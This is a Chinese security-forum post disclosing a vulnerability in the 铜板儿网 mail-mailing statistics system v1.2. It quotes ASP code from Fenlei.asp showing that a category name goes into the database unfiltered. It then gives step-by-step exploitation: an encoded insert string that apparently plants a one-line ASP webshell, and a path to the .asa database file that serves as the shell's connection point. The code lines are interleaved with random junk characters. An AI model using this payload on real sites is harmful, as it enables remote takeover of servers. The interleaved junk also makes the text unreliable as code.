找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1948|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
: v$ r3 _/ k; P/ O; [% a( x) k6 p4 k. p: S$ L$ }
IF Request.QueryString("Action")="del" Then " J6 {( Q! n6 G+ r
ID=Request.QueryString("ID")
: M* V0 T; z& \, w* A5 a! XIF Countss ("tui","Fenlei",ID )<>0 then
/ H: y1 x& o0 A6 B'略
- S1 @; x) @' X; \2 ^8 B  ]IF Request.QueryString("Action")="Add" Then 5 u  ?3 U7 k7 Q: g
Tname=Request.Form("Typename")
- u3 K9 v5 Z& l+ o* uSet Rs=Server.CreateObject("adodb.Recordset")
, `5 T5 `- t/ l8 ^& V/ jSql="Select * From Fenlei Order by id Desc " ; a' U7 l% C' k" A: v2 A: M  U8 s5 n
Rs.Open Sql,Conn,1,3 - e" a1 j: A- M) f& a% h
Rs.Addnew 6 B. D# W; ~- ?4 R; S
Rs("Typename")=Tname
' `7 ^6 J3 T% K! u# {'略 3 N" D! S5 m# T" q: ?
Set Rs=Server.CreateObject("adodb.Recordset")
8 H7 Z# B0 u, s0 j& Q& cSql="Select * From Fenlei Order by id Desc "
0 y8 u( ]! l+ W( ORs.Open Sql,Conn,1,1
$ D8 R2 l- |0 A: C$ l'略
8 l6 A0 A+ d$ k" [, J: T# k3 G* n%>0 Z' v" v/ x* ]% W9 f- ]

7 D: i! J9 g0 a' J! X! x% R: {
1 D" T# k  W: e7 ^3 `
. d2 G3 a( z0 x" s& o" g. _没有过滤,直接写入数据库。0 J8 _! l5 L; c1 D) u9 T

. s8 Y% E9 l% a+ c% i+ T; r利用方法:
4 h  s  k' h' k/ p' P  d% D 6 p. X1 R) W: M) j4 |
插入:┼攠數畣整爠煥敵瑳∨≡┩>+ I$ O, u, F! f/ a$ x: E& V  U6 {8 N
+ f* j: x- _( D' y" g/ X+ }0 }
  h& F, Z! d* p8 b7 v" O: Y
连接: http://www.xxx.com/###tongbaner.asa - a4 H0 H" W+ a2 l5 L: c+ W" l' C
'默认安装文件:
% M0 `7 o& z; @4 o( w, x. ['install.asp7 R0 {6 j% M; I+ A% u0 C& L4 [7 P7 C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表